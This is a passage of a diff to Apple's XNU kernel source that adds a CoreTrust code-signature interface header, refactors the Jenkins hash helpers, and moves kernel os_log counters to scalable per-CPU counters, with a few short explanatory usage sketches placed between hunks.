+       char         * OS_PTRAUTH_SIGNED_PTR("OSString.string") string;
        unsigned int   flags;
        unsigned int   length;
 
diff --git a/libkern/libkern/coretrust/Makefile b/libkern/libkern/coretrust/Makefile
new file mode 100644 (file)
index 0000000..8faf50f
--- /dev/null
@@ -0,0 +1,24 @@
+export MakeInc_cmd=${SRCROOT}/makedefs/MakeInc.cmd
+export MakeInc_def=${SRCROOT}/makedefs/MakeInc.def
+export MakeInc_rule=${SRCROOT}/makedefs/MakeInc.rule
+export MakeInc_dir=${SRCROOT}/makedefs/MakeInc.dir
+
+include $(MakeInc_cmd)
+include $(MakeInc_def)
+
+DATAFILES =
+PRIVATE_DATAFILES =
+KERNELFILES =
+PRIVATE_KERNELFILES = coretrust.h
+
+INSTALL_MI_LIST = ${DATAFILES}
+INSTALL_MI_LCL_LIST = ${PRIVATE_DATAFILES}
+INSTALL_KF_MI_LIST = ${KERNELFILES}
+INSTALL_KF_MI_LCL_LIST = ${PRIVATE_KERNELFILES}
+EXPORT_MI_LIST = ${INSTALL_KF_MI_LCL_LIST}
+
+INSTALL_MI_DIR = libkern/coretrust
+EXPORT_MI_DIR = libkern/coretrust
+
+include $(MakeInc_rule)
+include $(MakeInc_dir)
\ No newline at end of file
diff --git a/libkern/libkern/coretrust/coretrust.h b/libkern/libkern/coretrust/coretrust.h
new file mode 100644 (file)
index 0000000..dafe3db
--- /dev/null
@@ -0,0 +1,93 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#ifndef __CORETRUST_H
+#define __CORETRUST_H
+
+#include <os/base.h>
+#include <sys/cdefs.h>
+#include <sys/types.h>
+
+#if XNU_KERNEL_PRIVATE
+/*
+ * Only include this when building for XNU. CoreTrust will include its
+ * local copy of the header.
+ */
+#include <coretrust/CTEvaluate.h>
+#endif
+
+/*
+ * We add more definitions as the need for them arises. Please refer
+ * to <coretrust/CTEvaluate.h> for more information.
+ */
+
+typedef int (*coretrust_CTEvaluateAMFICodeSignatureCMS_t)(
+       const uint8_t *cms_data,
+       size_t cms_data_length,
+       const uint8_t *detached_data,
+       size_t detached_data_length,
+       bool allow_test_hierarchy,
+       const uint8_t **leaf_certificate,
+       size_t *leaf_certificate_length,
+       CoreTrustPolicyFlags *policy_flags,
+       CoreTrustDigestType *cms_digest_type,
+       CoreTrustDigestType *hash_agility_digest_type,
+       const uint8_t **digest_data,
+       size_t *digest_length
+       );
+
+typedef struct _coretrust {
+       coretrust_CTEvaluateAMFICodeSignatureCMS_t CTEvaluateAMFICodeSignatureCMS;
+} coretrust_t;
+
+__BEGIN_DECLS
+
+/*!
+ * @const coretrust
+ * The CoreTrust interface that was registered.
+ */
+extern const coretrust_t *coretrust;
+
+/*!
+ * @function coretrust_interface_register
+ * Registers the CoreTrust kext interface for use within the kernel proper.
+ *
+ * @param ct
+ * The interface to register.
+ *
+ * @discussion
+ * This routine may only be called once and must be called before late-const has
+ * been applied to kernel memory.
+ */
+OS_EXPORT OS_NONNULL1
+void
+coretrust_interface_register(const coretrust_t *ct);
+
+__END_DECLS
+
+#endif // __CORETRUST_H
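A hedged caller-side sketch (not part of this header; the example_ name is hypothetical and a zero return is assumed to mean the CMS blob validated) of how kernel code is expected to use the interface once the CoreTrust kext has registered it:

static bool
example_evaluate_amfi_cms(const uint8_t *cms, size_t cms_len,
    const uint8_t *detached, size_t detached_len)
{
        const uint8_t *leaf = NULL;
        size_t leaf_len = 0;
        CoreTrustPolicyFlags policy = 0;
        CoreTrustDigestType cms_digest = 0;
        CoreTrustDigestType agility_digest = 0;
        const uint8_t *digest = NULL;
        size_t digest_len = 0;

        if (coretrust == NULL) {
                /* The CoreTrust kext has not registered its interface yet. */
                return false;
        }
        return coretrust->CTEvaluateAMFICodeSignatureCMS(cms, cms_len,
                   detached, detached_len, false /* allow_test_hierarchy */,
                   &leaf, &leaf_len, &policy, &cms_digest, &agility_digest,
                   &digest, &digest_len) == 0;
}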
index 765b93320b8a7f21c435318f96437c43005889d9..5aa469babb0a8a55c80f0c2db24c7f94b437149c 100644 (file)
  */
 #if __has_feature(ptrauth_calls)
 ptrauth_generic_signature_t
-ptrauth_utils_sign_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int flags);
+ptrauth_utils_sign_blob_generic(const void * ptr, size_t len_bytes, uint64_t data, int flags);
 #else
 static inline ptrauth_generic_signature_t
-ptrauth_utils_sign_blob_generic(__unused void * ptr, __unused size_t len_bytes, __unused uint64_t data, __unused int flags)
+ptrauth_utils_sign_blob_generic(__unused const void * ptr, __unused size_t len_bytes, __unused uint64_t data, __unused int flags)
 {
        return 0;
 }
@@ -89,10 +89,10 @@ ptrauth_utils_sign_blob_generic(__unused void * ptr, __unused size_t len_bytes,
  */
 #if __has_feature(ptrauth_calls)
 void
-ptrauth_utils_auth_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int flags, ptrauth_generic_signature_t signature);
+ptrauth_utils_auth_blob_generic(const void * ptr, size_t len_bytes, uint64_t data, int flags, ptrauth_generic_signature_t signature);
 #else
 static inline void
-ptrauth_utils_auth_blob_generic(__unused void * ptr, __unused size_t len_bytes, __unused uint64_t data, __unused int flags, __unused ptrauth_generic_signature_t signature)
+ptrauth_utils_auth_blob_generic(__unused const void * ptr, __unused size_t len_bytes, __unused uint64_t data, __unused int flags, __unused ptrauth_generic_signature_t signature)
 {
        return;
 }
index 276a91f5e0cef31b657c531ede8f061e62a845d5..933b0efa3d38989c9b4c61053409e45b74f9a4df 100644 (file)
@@ -243,8 +243,8 @@ _os_atomic_mo_has_release(OS_ATOMIC_STD memory_order ord)
 
 #define _os_atomic_clang_op(p, v, m, o, op) ({ \
        __auto_type _v = _os_atomic_value_cast(p, v); \
-       __auto_type _r = _os_atomic_clang_op_orig(p, _v, m, o); \
-       op(_r, _v); \
+       __auto_type _s = _os_atomic_clang_op_orig(p, _v, m, o); \
+       op(_s, _v); \
 })
 
 #if OS_ATOMIC_CONFIG_MEMORY_ORDER_DEPENDENCY
index 264146fb91e73573207eb31538082d1263aa0908..3e90258e8225e2d586c915239328bd6da5debab8 100644 (file)
 
 __BEGIN_DECLS
 
+static inline uint32_t
+os_hash_jenkins_update(const void *data, size_t length, uint32_t hash)
+{
+       const uint8_t *key = (const uint8_t *)data;
+
+       for (size_t i = 0; i < length; i++) {
+               hash += key[i];
+               hash += (hash << 10);
+               hash ^= (hash >> 6);
+       }
+
+       return hash;
+}
+
+static inline uint32_t
+os_hash_jenkins_finish(uint32_t hash)
+{
+       hash += (hash << 3);
+       hash ^= (hash >> 11);
+       hash += (hash << 15);
+
+       return hash;
+}
+
 /*!
  * @function os_hash_jenkins
  *
@@ -56,20 +80,7 @@ __BEGIN_DECLS
 static inline uint32_t
 os_hash_jenkins(const void *data, size_t length)
 {
-       const uint8_t *key = (const uint8_t *)data;
-       uint32_t hash = 0;
-
-       for (size_t i = 0; i < length; i++) {
-               hash += key[i];
-               hash += (hash << 10);
-               hash ^= (hash >> 6);
-       }
-
-       hash += (hash << 3);
-       hash ^= (hash >> 11);
-       hash += (hash << 15);
-
-       return hash;
+       return os_hash_jenkins_finish(os_hash_jenkins_update(data, length, 0));
 }
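A minimal usage sketch (the helper below is hypothetical): the update/finish split lets callers feed discontiguous buffers through the hash incrementally and obtain the same value a single os_hash_jenkins() call would produce over the concatenated bytes.

static uint32_t
hash_two_buffers(const void *a, size_t a_len, const void *b, size_t b_len)
{
        uint32_t h = 0;

        h = os_hash_jenkins_update(a, a_len, h);
        h = os_hash_jenkins_update(b, b_len, h);
        return os_hash_jenkins_finish(h);
}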
 
 /*!
index 0cd4a9deb0d69adfdb0527f168582ef3222fc88e..c3698156105b67ea487a5978257d49f83ee315f4 100644 (file)
@@ -37,6 +37,7 @@
 #include "trace_internal.h"
 
 #include "log_encode.h"
+#include "log_mem.h"
 
 struct os_log_s {
        int a;
@@ -44,6 +45,9 @@ struct os_log_s {
 
 struct os_log_s _os_log_default;
 struct os_log_s _os_log_replay;
+
+LOGMEM_STATIC_INIT(os_log_mem, 14, 9, 10);
+
 extern vm_offset_t kernel_firehose_addr;
 extern firehose_chunk_t firehose_boot_chunk;
 
@@ -65,24 +69,26 @@ extern int oslog_stream_open;
 extern void *OSKextKextForAddress(const void *);
 
 /* Counters for persistence mode */
-uint32_t oslog_p_total_msgcount = 0;
-uint32_t oslog_p_metadata_saved_msgcount = 0;
-uint32_t oslog_p_metadata_dropped_msgcount = 0;
-uint32_t oslog_p_error_count = 0;
-uint32_t oslog_p_saved_msgcount = 0;
-uint32_t oslog_p_dropped_msgcount = 0;
-uint32_t oslog_p_boot_dropped_msgcount = 0;
-uint32_t oslog_p_coprocessor_total_msgcount = 0;
-uint32_t oslog_p_coprocessor_dropped_msgcount = 0;
+SCALABLE_COUNTER_DEFINE(oslog_p_total_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_metadata_saved_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_metadata_dropped_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_error_count);
+SCALABLE_COUNTER_DEFINE(oslog_p_saved_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_dropped_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_boot_dropped_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_coprocessor_total_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_coprocessor_dropped_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_unresolved_kc_msgcount);
 
 /* Counters for streaming mode */
-uint32_t oslog_s_total_msgcount = 0;
-uint32_t oslog_s_error_count = 0;
-uint32_t oslog_s_metadata_msgcount = 0;
+SCALABLE_COUNTER_DEFINE(oslog_s_error_count);
+/* Protected by the stream lock */
+uint32_t oslog_s_total_msgcount;
+uint32_t oslog_s_metadata_msgcount;
 
 /* Counters for msgbuf logging */
-uint32_t oslog_msgbuf_msgcount = 0;
-uint32_t oslog_msgbuf_dropped_msgcount = 0;
+SCALABLE_COUNTER_DEFINE(oslog_msgbuf_msgcount)
+SCALABLE_COUNTER_DEFINE(oslog_msgbuf_dropped_msgcount)
 
 static bool oslog_boot_done = false;
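A minimal sketch of the counter API this file now uses, assuming the usual kern/counter.h semantics (the example_ names are illustrative and the 64-bit load width is an assumption): counter_inc() takes the per-CPU fast path on the hot logging paths, while counter_load() folds the per-CPU values when sysctls or tests read the totals.

#include <kern/counter.h>

SCALABLE_COUNTER_DEFINE(example_msgcount);      /* definition, one per .c file */

static void
example_log_event(void)
{
        counter_inc(&example_msgcount);         /* cheap, no shared cache line */
}

static uint64_t
example_read_msgcount(void)
{
        return counter_load(&example_msgcount); /* sums all per-CPU deltas */
}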
 
@@ -112,36 +118,36 @@ static void
 _os_log_to_msgbuf_internal(const char *format, va_list args, bool safe, bool logging, bool addcr);
 
 static void
-_os_log_to_log_internal(os_log_t oslog, os_log_type_t type,
-    const char *format, va_list args, void *addr, void *dso, bool driverKit);
+_os_log_to_log_internal(os_log_type_t type, const char *format, va_list args, void *addr, void *dso, bool driverKit);
 
-
-static void
-_os_log_actual(os_log_t oslog, os_log_type_t type, const char *format, void
-    *dso, void *addr, os_log_buffer_context_t context, bool driverKit);
+static bool
+os_log_turned_off(void)
+{
+       return atm_get_diagnostic_config() & (ATM_TRACE_DISABLE | ATM_TRACE_OFF);
+}
 
 bool
 os_log_info_enabled(os_log_t log __unused)
 {
-       return true;
+       return !os_log_turned_off();
 }
 
 bool
 os_log_debug_enabled(os_log_t log __unused)
 {
-       return true;
+       return !os_log_turned_off();
 }
 
-os_log_t
-os_log_create(const char *subsystem __unused, const char *category __unused)
+static bool
+os_log_disabled(void)
 {
-       return &_os_log_default;
+       return atm_get_diagnostic_config() & ATM_TRACE_DISABLE;
 }
 
-bool
-_os_log_string_is_public(const char *str __unused)
+os_log_t
+os_log_create(const char *subsystem __unused, const char *category __unused)
 {
-       return true;
+       return &_os_log_default;
 }
 
 __attribute__((noinline, not_tail_called)) void
@@ -226,29 +232,20 @@ static void
 _os_log_with_args_internal(os_log_t oslog, os_log_type_t type,
     const char *format, va_list args, void *addr, void *dso, bool driverKit, bool addcr)
 {
-       uint32_t  logging_config = atm_get_diagnostic_config();
-       boolean_t safe;
-       boolean_t logging;
-
        if (format[0] == '\0') {
                return;
        }
 
        /* early boot can log to dmesg for later replay (27307943) */
-       safe = (startup_phase < STARTUP_SUB_EARLY_BOOT || oslog_is_safe());
-
-       if (logging_config & ATM_TRACE_DISABLE || logging_config & ATM_TRACE_OFF) {
-               logging = false;
-       } else {
-               logging = true;
-       }
+       bool safe = (startup_phase < STARTUP_SUB_EARLY_BOOT || oslog_is_safe());
+       bool logging = !os_log_turned_off();
 
        if (oslog != &_os_log_replay) {
                _os_log_to_msgbuf_internal(format, args, safe, logging, addcr);
        }
 
        if (safe && logging) {
-               _os_log_to_log_internal(oslog, type, format, args, addr, dso, driverKit);
+               _os_log_to_log_internal(type, format, args, addr, dso, driverKit);
        }
 }
 
@@ -268,7 +265,7 @@ _os_log_to_msgbuf_internal(const char *format, va_list args, bool safe, bool log
        va_list args_copy;
 
        if (!bsd_log_lock(safe)) {
-               os_atomic_inc(&oslog_msgbuf_dropped_msgcount, relaxed);
+               counter_inc(&oslog_msgbuf_dropped_msgcount);
                return;
        }
 
@@ -350,177 +347,101 @@ _os_log_to_msgbuf_internal(const char *format, va_list args, bool safe, bool log
 
        bsd_log_unlock();
        logwakeup(msgbufp);
-       os_atomic_inc(&oslog_msgbuf_msgcount, relaxed);
+       counter_inc(&oslog_msgbuf_msgcount);
 }
 
-static void
-_os_log_to_log_internal(os_log_t oslog, os_log_type_t type,
-    const char *format, va_list args, void *addr, void *dso, bool driverKit)
+static firehose_stream_t
+firehose_stream(os_log_type_t type)
 {
-       kc_format_t kcformat = KCFormatUnknown;
-       struct os_log_buffer_context_s context;
-       unsigned char buffer_data[OS_LOG_BUFFER_MAX_SIZE] __attribute__((aligned(8)));
-       os_log_buffer_t buffer = (os_log_buffer_t)buffer_data;
-       uint8_t pubdata[OS_LOG_BUFFER_MAX_SIZE];
-       va_list args_copy;
-
-       if (addr == NULL) {
-               return;
-       }
-
-       if (!PE_get_primary_kc_format(&kcformat)) {
-               return;
-       }
-
-       if (kcformat == KCFormatStatic || kcformat == KCFormatKCGEN) {
-               void *baseAddress = PE_get_kc_baseaddress(KCKindPrimary);
-               if (!baseAddress) {
-                       return;
-               }
-               dso = baseAddress;
-       } else if (kcformat == KCFormatDynamic || kcformat == KCFormatFileset) {
-               if (dso == NULL) {
-                       dso = (void *) OSKextKextForAddress(format);
-                       if (dso == NULL) {
-                               return;
-                       }
-               }
-               if (!_os_trace_addr_in_text_segment(dso, format)) {
-                       return;
-               }
-               if (!driverKit) {
-                       void *dso_addr = (void *) OSKextKextForAddress(addr);
-                       if (dso != dso_addr) {
-                               return;
-                       }
-               }
-       }
-
-       memset(&context, 0, sizeof(context));
-       memset(buffer, 0, OS_LOG_BUFFER_MAX_SIZE);
+       return (type == OS_LOG_TYPE_INFO || type == OS_LOG_TYPE_DEBUG) ?
+              firehose_stream_memory : firehose_stream_persist;
+}
 
-       context.shimmed = true;
-       context.buffer = buffer;
-       context.content_sz = OS_LOG_BUFFER_MAX_SIZE - sizeof(*buffer);
-       context.pubdata = pubdata;
-       context.pubdata_sz = sizeof(pubdata);
+static void
+_os_log_actual(os_log_type_t type, const char *format, void *dso, void *addr, uint8_t *logdata, size_t logdata_sz,
+    firehose_tracepoint_flags_t flags, bool driverKit)
+{
+       firehose_tracepoint_id_u trace_id;
 
-       va_copy(args_copy, args);
+       firehose_stream_t stream = firehose_stream(type);
+       uint64_t timestamp = firehose_tracepoint_time(firehose_activity_flags_default);
 
-       os_atomic_inc(&oslog_p_total_msgcount, relaxed);
-       if (_os_log_encode(format, args_copy, 0, &context)) {
-               _os_log_actual(oslog, type, format, dso, addr, &context, driverKit);
+       if (driverKit) {
+               // set FIREHOSE_TRACEPOINT_PC_DYNAMIC_BIT so logd will not try to find the format string in
+               // the executable text
+               trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log,
+                   type, flags, (uint32_t)((uintptr_t)addr | FIREHOSE_TRACEPOINT_PC_DYNAMIC_BIT));
        } else {
-               os_atomic_inc(&oslog_p_error_count, relaxed);
+               // create trace_id after we've set additional flags
+               trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log,
+                   type, flags, _os_trace_offset(dso, format, (_firehose_tracepoint_flags_activity_t)flags));
        }
 
-       va_end(args_copy);
+
+       _firehose_trace(stream, trace_id, timestamp, logdata, logdata_sz, true);
 }
 
-static inline size_t
-_os_trace_write_location_for_address(uint8_t buf[static sizeof(uint64_t)],
-    void *dso, const void *address, firehose_tracepoint_flags_t *flags, __unused bool driverKit)
+static void *
+resolve_dso(const char *fmt, void *dso, void *addr, bool driverKit)
 {
-       uintptr_t shift_addr = (uintptr_t)address - (uintptr_t)dso;
-
        kc_format_t kcformat = KCFormatUnknown;
-       __assert_only bool result = PE_get_primary_kc_format(&kcformat);
-       assert(result);
 
-       if (kcformat == KCFormatStatic || kcformat == KCFormatKCGEN) {
-               *flags = _firehose_tracepoint_flags_pc_style_shared_cache;
-               memcpy(buf, (uint32_t[]){ (uint32_t)shift_addr }, sizeof(uint32_t));
-               return sizeof(uint32_t);
-       } else {
-               kernel_mach_header_t *mh = dso;
-
-               /*
-                * driverKit will have the dso set as MH_EXECUTE
-                * (it is logging from a syscall in the kernel)
-                * but needs logd to parse the address as an
-                * absolute pc.
-                */
-               if (mh->filetype == MH_EXECUTE && !driverKit) {
-                       *flags = _firehose_tracepoint_flags_pc_style_main_exe;
-                       memcpy(buf, (uint32_t[]){ (uint32_t)shift_addr }, sizeof(uint32_t));
-                       return sizeof(uint32_t);
-               } else {
-                       *flags = _firehose_tracepoint_flags_pc_style_absolute;
-                       if (!driverKit) {
-                               shift_addr = VM_KERNEL_UNSLIDE(address);
-                       } else {
-                               shift_addr = (uintptr_t) address;
-                       }
-                       memcpy(buf, (uintptr_t[]){ shift_addr }, sizeof(uintptr_t));
-#if __LP64__
-                       return 6; // 48 bits are enough
-#else
-                       return sizeof(uintptr_t);
-#endif
-               }
+       if (!PE_get_primary_kc_format(&kcformat)) {
+               return NULL;
        }
-}
 
-
-OS_ALWAYS_INLINE
-static inline size_t
-_os_log_buffer_pack(uint8_t *buffdata, size_t buffdata_sz,
-    os_log_buffer_context_t ctx)
-{
-       os_log_buffer_t buffer = ctx->buffer;
-       size_t buffer_sz = sizeof(*ctx->buffer) + ctx->content_sz;
-       size_t total_sz  = buffer_sz + ctx->pubdata_sz;
-
-       if (total_sz > buffdata_sz) {
-               return 0;
+       switch (kcformat) {
+       case KCFormatStatic:
+       case KCFormatKCGEN:
+               dso = PE_get_kc_baseaddress(KCKindPrimary);
+               break;
+       case KCFormatDynamic:
+       case KCFormatFileset:
+               if (!dso && (dso = (void *)OSKextKextForAddress(fmt)) == NULL) {
+                       return NULL;
+               }
+               if (!_os_trace_addr_in_text_segment(dso, fmt)) {
+                       return NULL;
+               }
+               if (!driverKit && (dso != (void *)OSKextKextForAddress(addr))) {
+                       return NULL;
+               }
+               break;
+       default:
+               panic("unknown KC format type");
        }
 
-       memcpy(buffdata, buffer, buffer_sz);
-       memcpy(&buffdata[buffer_sz], ctx->pubdata, ctx->pubdata_sz);
-       return total_sz;
+       return dso;
 }
 
 static void
-_os_log_actual(os_log_t oslog __unused, os_log_type_t type, const char *format,
-    void *dso, void *addr, os_log_buffer_context_t context, bool driverKit)
+_os_log_to_log_internal(os_log_type_t type, const char *fmt, va_list args, void *addr, void *dso, bool driverKit)
 {
-       firehose_stream_t stream;
-       firehose_tracepoint_flags_t flags = 0;
-       firehose_tracepoint_id_u trace_id;
-       uint8_t buffdata[OS_LOG_BUFFER_MAX_SIZE];
-       size_t addr_len = 0, buffdata_sz;
-       uint64_t timestamp;
-       uint64_t thread_id;
-
-       // dso == the start of the binary that was loaded
-       addr_len = _os_trace_write_location_for_address(buffdata, dso, addr, &flags, driverKit);
-       buffdata_sz = _os_log_buffer_pack(buffdata + addr_len,
-           sizeof(buffdata) - addr_len, context);
-       if (buffdata_sz == 0) {
+       counter_inc(&oslog_p_total_msgcount);
+
+       if (addr == NULL) {
+               counter_inc(&oslog_p_unresolved_kc_msgcount);
                return;
        }
-       buffdata_sz += addr_len;
 
-       timestamp = firehose_tracepoint_time(firehose_activity_flags_default);
-       thread_id = thread_tid(current_thread());
-
-       if (driverKit) {
-               // set FIREHOSE_TRACEPOINT_PC_DYNAMIC_BIT so logd will not try to find the format string in
-               // the executable text
-               trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log,
-                   type, flags, (uint32_t)((uintptr_t)addr | FIREHOSE_TRACEPOINT_PC_DYNAMIC_BIT));
-       } else {
-               // create trace_id after we've set additional flags
-               trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log,
-                   type, flags, _os_trace_offset(dso, format, (_firehose_tracepoint_flags_activity_t)flags));
+       if ((dso = resolve_dso(fmt, dso, addr, driverKit)) == NULL) {
+               counter_inc(&oslog_p_unresolved_kc_msgcount);
+               return;
        }
 
-       if (type == OS_LOG_TYPE_INFO || type == OS_LOG_TYPE_DEBUG) {
-               stream = firehose_stream_memory;
+       uint8_t buffer[OS_LOG_BUFFER_MAX_SIZE] __attribute__((aligned(8))) = { 0 };
+       struct os_log_context_s ctx;
+
+       os_log_context_init(&ctx, &os_log_mem, buffer, sizeof(buffer));
+
+       if (os_log_context_encode(&ctx, fmt, args, addr, dso, driverKit)) {
+               _os_log_actual(type, fmt, dso, addr, ctx.ctx_buffer, ctx.ctx_content_sz,
+                   ctx.ctx_ft_flags, driverKit);
        } else {
-               stream = firehose_stream_persist;
+               counter_inc(&oslog_p_error_count);
        }
-       _firehose_trace(stream, trace_id, timestamp, buffdata, buffdata_sz, true);
+
+       os_log_context_free(&ctx);
 }
 
 bool
@@ -529,14 +450,18 @@ os_log_coprocessor(void *buff, uint64_t buff_len, os_log_type_t type,
 {
        firehose_tracepoint_id_u trace_id;
        firehose_tracepoint_id_t return_id = 0;
-       firehose_stream_t        stream;
        uint8_t                  pubdata[OS_LOG_BUFFER_MAX_SIZE];
        size_t                   wr_pos = 0;
 
+       if (os_log_turned_off()) {
+               return false;
+       }
+
        if (buff_len + 16 + sizeof(uint32_t) > OS_LOG_BUFFER_MAX_SIZE) {
                return false;
        }
 
+       firehose_stream_t stream = firehose_stream(type);
        // unlike kext, where pc is used to find uuid, in coprocessor logs the uuid is passed as part of the tracepoint
        firehose_tracepoint_flags_t flags = _firehose_tracepoint_flags_pc_style_uuid_relative;
 
@@ -551,20 +476,14 @@ os_log_coprocessor(void *buff, uint64_t buff_len, os_log_type_t type,
        trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log,
            type, flags, offset);
 
-       if (type == OS_LOG_TYPE_INFO || type == OS_LOG_TYPE_DEBUG) {
-               stream = firehose_stream_memory;
-       } else {
-               stream = firehose_stream_persist;
-       }
-
-       os_atomic_inc(&oslog_p_coprocessor_total_msgcount, relaxed);
+       counter_inc(&oslog_p_coprocessor_total_msgcount);
 
        // send firehose tracepoint containing os log to firehose buffer
        return_id = _firehose_trace(stream, trace_id, timestamp, pubdata,
            buff_len + wr_pos, stream_log);
 
        if (return_id == 0) {
-               os_atomic_inc(&oslog_p_coprocessor_dropped_msgcount, relaxed);
+               counter_inc(&oslog_p_coprocessor_dropped_msgcount);
                return false;
        }
        return true;
@@ -582,7 +501,7 @@ _firehose_trace(firehose_stream_t stream, firehose_tracepoint_id_u ftid,
 
        if (slowpath(ft_size + publen > _firehose_chunk_payload_size)) {
                // We'll need to have some handling here. For now - return 0
-               os_atomic_inc(&oslog_p_error_count, relaxed);
+               counter_inc(&oslog_p_error_count);
                return 0;
        }
 
@@ -604,11 +523,11 @@ out:
        if (!fastpath(ft)) {
                if (oslog_boot_done) {
                        if (stream == firehose_stream_metadata) {
-                               os_atomic_inc(&oslog_p_metadata_dropped_msgcount, relaxed);
+                               counter_inc(&oslog_p_metadata_dropped_msgcount);
                        } else {
                                // If we run out of space in the persistence buffer we're
                                // dropping the message.
-                               os_atomic_inc(&oslog_p_dropped_msgcount, relaxed);
+                               counter_inc(&oslog_p_dropped_msgcount);
                        }
                        return 0;
                }
@@ -619,7 +538,7 @@ out:
                offset = firehose_chunk_tracepoint_try_reserve(fbc, stamp,
                    firehose_stream_persist, 0, (uint16_t)publen, 0, NULL);
                if (offset <= 0) {
-                       os_atomic_inc(&oslog_p_boot_dropped_msgcount, relaxed);
+                       counter_inc(&oslog_p_boot_dropped_msgcount);
                        return 0;
                }
 
@@ -627,7 +546,7 @@ out:
                    thread_tid(current_thread()), offset);
                memcpy(ft->ft_data, pubdata, publen);
                firehose_chunk_tracepoint_end(fbc, ft, ftid);
-               os_atomic_inc(&oslog_p_saved_msgcount, relaxed);
+               counter_inc(&oslog_p_saved_msgcount);
                return ftid.ftid_value;
        }
        if (!oslog_boot_done) {
@@ -637,9 +556,9 @@ out:
 
        __firehose_buffer_tracepoint_flush(ft, ftid);
        if (stream == firehose_stream_metadata) {
-               os_atomic_inc(&oslog_p_metadata_saved_msgcount, relaxed);
+               counter_inc(&oslog_p_metadata_saved_msgcount);
        } else {
-               os_atomic_inc(&oslog_p_saved_msgcount, relaxed);
+               counter_inc(&oslog_p_saved_msgcount);
        }
        return ftid.ftid_value;
 }
@@ -686,6 +605,10 @@ os_log_coprocessor_register(const char *uuid, const char *file_path, bool copy)
                char path[PATH_MAX + sizeof(struct firehose_trace_uuid_info_s)];
        } buf;
 
+       if (os_log_disabled()) {
+               return;
+       }
+
        if (path_size > PATH_MAX) {
                return;
        }
@@ -716,6 +639,10 @@ firehose_trace_metadata(firehose_stream_t stream, firehose_tracepoint_id_u ftid,
 {
        oslog_stream_buf_entry_t m_entry = NULL;
 
+       if (os_log_disabled()) {
+               return;
+       }
+
        // If streaming mode is not on, only log  the metadata
        // in the persistence buffer
 
@@ -730,7 +657,7 @@ firehose_trace_metadata(firehose_stream_t stream, firehose_tracepoint_id_u ftid,
        m_entry = oslog_stream_create_buf_entry(oslog_stream_link_type_metadata, ftid,
            stamp, pubdata, publen);
        if (!m_entry) {
-               os_atomic_inc(&oslog_s_error_count, relaxed);
+               counter_inc(&oslog_s_error_count);
                goto finish;
        }
 
@@ -855,9 +782,9 @@ test_os_log()
        T_ASSERT_EQ_INT(TRUE, os_log_debug_enabled(log_handle), "os_log_debug is enabled");
        T_ASSERT_EQ_PTR(&_os_log_default, OS_LOG_DEFAULT, "ensure OS_LOG_DEFAULT is _os_log_default");
 
-       total_msg = oslog_p_total_msgcount;
-       saved_msg = oslog_p_saved_msgcount;
-       dropped_msg = oslog_p_dropped_msgcount;
+       total_msg = counter_load(&oslog_p_total_msgcount);
+       saved_msg = counter_load(&oslog_p_saved_msgcount);
+       dropped_msg = counter_load(&oslog_p_dropped_msgcount);
        T_LOG("oslog internal counters total %u , saved %u, dropped %u", total_msg, saved_msg, dropped_msg);
 
        T_LOG("Validating with uniqid %u u64 %llu", uniqid, a);
@@ -886,45 +813,45 @@ test_os_log()
        }
 
        /* for enabled logging printfs should be saved in oslog as well */
-       T_EXPECT_GE_UINT((oslog_p_total_msgcount - total_msg), 2, "atleast 2 msgs should be seen by oslog system");
+       T_EXPECT_GE_UINT((counter_load(&oslog_p_total_msgcount) - total_msg), 2, "atleast 2 msgs should be seen by oslog system");
 
        a = mach_absolute_time();
        total_seqno = 1;
        seqno = 1;
-       total_msg = oslog_p_total_msgcount;
-       saved_msg = oslog_p_saved_msgcount;
-       dropped_msg = oslog_p_dropped_msgcount;
+       total_msg = counter_load(&oslog_p_total_msgcount);
+       saved_msg = counter_load(&oslog_p_saved_msgcount);
+       dropped_msg = counter_load(&oslog_p_dropped_msgcount);
        datalen = scnprintf(databuffer, sizeof(databuffer), TESTOSLOGFMT("oslog_info"), uniqid, seqno, total_seqno);
        checksum = crc32(0, databuffer, datalen);
        os_log_info(log_handle, TESTOSLOG("oslog_info") "mat%llu", checksum, uniqid, seqno, total_seqno, a);
-       T_EXPECT_GE_UINT((oslog_p_total_msgcount - total_msg), 1, "total message count in buffer");
+       T_EXPECT_GE_UINT((counter_load(&oslog_p_total_msgcount) - total_msg), 1, "total message count in buffer");
 
        datalen = scnprintf(databuffer, sizeof(databuffer), "kernel^0^test^oslog_info#mat%llu", a);
